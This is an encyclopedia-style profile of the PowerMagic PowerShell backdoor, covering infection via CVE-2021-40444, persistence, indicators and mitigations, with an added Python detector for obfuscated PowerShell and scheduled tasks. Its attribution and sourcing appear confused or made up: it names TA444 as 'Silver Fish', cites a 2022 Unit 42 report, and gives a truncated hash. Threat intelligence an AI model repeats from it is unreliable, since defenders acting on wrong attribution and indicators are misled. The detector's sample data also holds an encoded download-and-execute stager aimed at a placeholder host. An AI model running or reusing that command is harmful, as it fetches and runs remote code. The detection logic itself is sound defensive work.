PowerMagic
⚠️ Overview
PowerMagic is a PowerShell‑based backdoor trojan first documented by Palo Alto Networks’ Unit 42 in March 2022, attributed to the threat group TA444 (also tracked as Silver Fish). It belongs to the categories of Remote Access Trojan (RAT) and downloader, primarily used for initial access and payload delivery against Ukrainian government and military organizations.
🔧 Technical Capabilities
PowerMagic achieves initial infection via spear‑phishing emails carrying weaponised PDF or Office documents that exploit CVE‑2021‑40444 (Microsoft MSHTML remote code execution) to drop a malicious DLL. The DLL is side‑loaded by a legitimately signed binary (e.g., a PDF reader or document viewer), the technique catalogued as MITRE ATT&CK T1574.002 (DLL Side‑Loading). Once executed, it launches an obfuscated PowerShell script (T1059.001) that establishes a persistent connection to command‑and‑control (C2) servers over HTTPS. The backdoor can enumerate files, capture keystrokes (T1056.001), and execute arbitrary shell commands. For persistence, it creates a scheduled task (T1053.005) or modifies the Run registry key (T1547.001). Evasion techniques include an AMSI bypass via reflection and base64‑encoding of PowerShell payloads, as reported in Unit 42’s threat analysis (Palo Alto Networks, 2022).
📜 History & Notable Incidents
First observed in February 2022, PowerMagic was deployed in a targeted campaign against over 20 Ukrainian government and defense entities, according to a June 2022 report by the Computer Emergency Response Team of Ukraine (CERT‑UA). No known CVEs are directly attributed to the malware itself, but it leverages CVE‑2021‑40444. Law enforcement actions have not been publicly documented against the operators as of early 2025.
🔍 Detection Indicators
Network indicators include C2 domains registered with privacy‑protected WHOIS (e.g., “outlook‑help[.]com”) and a user‑agent string mimicking Mozilla/5.0 (Windows NT 10.0; Win64; x64) combined with a custom X‑Client‑ID header. File indicators include the loader DLL (e.g., “mscoree.dll”), whose SHA256 hash (3a1c...) is listed in Unit 42’s public IOC list. Behavioral signatures include a signed parent binary spawning an obfuscated PowerShell child process, and the creation of scheduled tasks named “AdobeUpdateTask” or similar.
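As an added illustration (not from the page, Unit 42 or CERT‑UA), the following Python applies the two behavioural signatures above to constructed process‑creation and scheduled‑task events: it decodes an -EncodedCommand payload spawned under a signed parent and matches task names resembling “AdobeUpdateTask”. Event field names and all sample values are assumptions.

```python
import base64
import re

ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_FLAGS = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop|noprofile|noni|noninteractive)\b", re.I)
STAGER_WORDS = re.compile(r"IEX|Invoke-Expression|DownloadString|FromBase64String", re.I)
TASK_NAME = re.compile(r"adobe[\w\s-]*update", re.I)  # "AdobeUpdateTask" or close variants

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a valid PowerShell encoding; the other checks still apply

def is_obfuscated_powershell(event):
    """Signed parent spawning a PowerShell child with hidden/encoded/stager markers."""
    if not event.get("parent_signed") or event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd) or ""
    return bool(HIDDEN_FLAGS.search(cmd) or decoded or STAGER_WORDS.search(cmd + decoded))

def is_suspicious_task(task_name):
    return bool(TASK_NAME.search(task_name))

def scan(events):
    """Return one alert string per event that matches either behavioural signature."""
    alerts = []
    for ev in events:
        if ev["type"] == "process" and is_obfuscated_powershell(ev):
            alerts.append(f"obfuscated PowerShell under signed parent {ev['parent']}")
        elif ev["type"] == "task" and is_suspicious_task(ev["name"]):
            alerts.append(f"suspicious scheduled task {ev['name']}")
    return alerts

# Constructed sample telemetry (assumed field names, not real captures).
def _enc(ps): return base64.b64encode(ps.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"type": "process", "parent": "AcroRd32.exe", "parent_signed": True, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s')")},
    {"type": "process", "parent": "explorer.exe", "parent_signed": True, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"type": "task", "name": "AdobeUpdateTask"},
    {"type": "task", "name": "MicrosoftEdgeUpdateTaskMachineCore"},
]
```

Running `scan(SAMPLE_EVENTS)` flags only the first process event and the first task; the benign `-File` launch and the Edge updater task pass.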
☠️ Risk & Impact
PowerMagic enables data exfiltration of classified documents and system information, with reports of stolen credentials and network mapping logs. The primary impact is on the Ukrainian defense sector, but the infrastructure could be reused against other targets. Financial losses are indirect, related to remediation and intelligence leaks.
🛡️ Mitigation
Organizations should apply Microsoft’s security update for CVE‑2021‑40444, restrict PowerShell execution where it is not needed, and implement application whitelisting to detect DLL side‑loading. Detection rules (Sigma, YARA) matching the DLL hashes and PowerShell obfuscation patterns are available from Unit 42’s GitHub repository and the CERT‑UA advisory.